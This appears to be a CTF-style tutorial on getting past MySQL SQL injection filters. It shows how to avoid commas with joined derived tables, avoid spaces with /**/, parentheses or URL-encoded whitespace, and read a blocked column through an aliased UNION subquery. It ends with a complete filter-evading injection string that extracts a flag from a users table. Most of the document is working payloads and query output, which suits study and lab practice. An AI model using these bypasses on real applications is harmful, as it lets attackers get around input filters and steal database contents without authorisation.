Bypassing SQL injection filters on commas, spaces and column names
Comma filtered
Bypass with join inside a UNION query
```
mysql> select (select 1)a;
+---+
| a |
+---+
| 1 |
+---+

mysql> select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
```
SQL join combines rows from two or more tables based on a relationship between their columns.
Here (select 1)a is a one-row derived table whose single column is named 1; joining several such subqueries without an ON clause is a cross join, so the result is one row with one column per subquery, and no comma was typed anywhere.
Because the injected branch now selects from a (derived) table rather than listing literals, the payload takes the form union select * from (select 1)a join (select 2)b ……, with as many joined subqueries as the original query has columns.
Space filtered
Bypass with a comment /**/
```
mysql> select id,username from admin/**/where id='1';
+----+----------+
| id | username |
+----+----------+
|  1 | admin    |
+----+----------+
```
Bypass with parentheses
```
mysql> select id,username from(admin)where id='1';
+----+----------+
| id | username |
+----+----------+
|  1 | admin    |
+----+----------+
```
Replace the space with another whitespace character, URL-encoded: %20 %09 %0a %0b %0c %0d %a0 (%a0, the non-breaking space, depends on the connection character set and does not work everywhere).
Why %0a works: %0a is a line feed, i.e. a newline.
```
mysql> select
    -> id,username
    -> from
    -> admin
    -> where id = '1';
+----+----------+
| id | username |
+----+----------+
|  1 | admin    |
+----+----------+
```
No space follows select, from or admin here; each keyword is followed directly by a newline, which the parser treats as whitespace, so %0a can stand in for %20 in the payload.
Column name filtered
Problem setup
```
mysql> select * from users;
+----+----------------+
| id | flag           |
+----+----------------+
|  1 | flag{you_good} |
+----+----------------+
```
The table name users has already been found and we want the value of flag, but the column name flag is filtered.
Conventional approach: union select flag from users;
With the column name filtered, the task is to read the contents of the flag column without ever writing the word flag.
Solution
First, a plain select with two literal columns:
```
mysql> select 1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
```
Use a UNION to append the rows of users to it; the result's column names come from the first select, so the second column is now called 2 rather than flag:
```
mysql> select 1,2 union select * from users;
+---+----------------+
| 1 | 2              |
+---+----------------+
| 1 | 2              |
| 1 | flag{you_good} |
+---+----------------+
```
The result of that query is a derived table; give it an alias so it can be referenced:
```
mysql> select * from (select 1,2 union select * from users)c;
+---+----------------+
| 1 | 2              |
+---+----------------+
| 1 | 2              |
| 1 | flag{you_good} |
+---+----------------+
```
Extract the contents of the flag column through its new name: c.2 addresses the second column (after a dot MySQL accepts an all-digit identifier; writing the name in backticks works as well), and limit 1,2 skips the first row, which is the literal 1,2 row from the union. Two caveats: limit 1,2 contains a comma, and when this query is later used as a scalar subquery it must return exactly one row, so limit 1 offset 1 is the safer spelling for both reasons.
```
mysql> select c.2 from (select 1,2 union select * from users)c limit 1,2;
+----------------+
| 2              |
+----------------+
| flag{you_good} |
+----------------+
```
Practical application with two tables: user(id,name,password), which the vulnerable query reads, and users(id,flag), which holds the target:
```
mysql> select * from user where id ='1';
+----+-------+----------+
| id | name  | password |
+----+-------+----------+
|  1 | admin | admin123 |
+----+-------+----------+

mysql> select * from user where id ='-1' union select 1,2,3;
+----+------+----------+
| id | name | password |
+----+------+----------+
|  1 | 2    | 3        |
+----+------+----------+

mysql> select * from user where id ='-1' union select 1,2,(select c.2 from (select 1,2 union select * from users)c limit 1,2);
+----+------+----------------+
| id | name | password       |
+----+------+----------------+
|  1 | 2    | flag{you_good} |
+----+------+----------------+
```
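The three sections above each lift one restriction at a time; in practice a filter often strips commas and spaces and blocks the column name together. The following is an added example, not part of the original post, that combines the join trick from the comma section, the /**/ trick from the space section and the aliased-union trick from this section into one payload against the same assumed schema (user(id,name,password) read by the vulnerable query select * from user where id ='<input>', and users(id,flag) as the target; both tables and the filter rules are assumptions for the example). The only new ingredient is limit 1 offset 1 in place of limit 1,2, which removes the last comma and guarantees the subquery returns one row.

```sql
-- Added example (not from the original post). Assumed schema, as in the post:
--   user(id, name, password)   read by: select * from user where id ='<input>'
--   users(id, flag)            holds the value we want
-- Assumed filter: drops ',' and ' ', and rejects the substring 'flag'.

-- Step 1: match the three columns of user without typing a comma.
--   union select 1,2,3                                             -> blocked
--   union select * from (select 1)a join (select 2)b join (...)c   -> allowed

-- Step 2: build the two-column cover for users without a comma.
--   (select 1,2 union select * from users)                                  -> blocked
--   (select * from (select 1)e join (select 2)f union select * from users)  -> allowed
-- The union takes its column names from the first branch, so the flag
-- column is reachable as c.2 and the word flag never appears.

-- Step 3: pick the second row with LIMIT 1 OFFSET 1 (no comma, exactly one
-- row), and put that one-row derived table as the third join member so it
-- lands in the password column.

-- Step 4: replace every space with /**/.

-- Readable form of what the server executes; every space here is /**/ in
-- the payload, and the leading -1' makes the real branch return nothing:
select * from user where id ='-1'
union
select * from (select 1)a
join (select 2)b
join (select c.2
      from (select * from (select 1)e join (select 2)f
            union
            select * from users)c
      limit 1 offset 1)d;

-- The same statement as the injected value of id, space-free. The trailing
-- '#' comments out the application's closing quote and must be sent as %23
-- in a URL:
-- -1'/**/union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/c.2/**/from/**/(select/**/*/**/from/**/(select/**/1)e/**/join/**/(select/**/2)f/**/union/**/select/**/*/**/from/**/users)c/**/limit/**/1/**/offset/**/1)d#
```

With the post's data the returned row carries the flag in the password column, exactly as in the last transcript above. The derived table d has one column named 2, as does b; duplicate names are only an error inside a derived table or view, not in the top-level result of a join, so the outer select * is accepted. If the application also strips /* */, the %0a, %09 or parenthesis substitutes from the space section drop into the same payload unchanged.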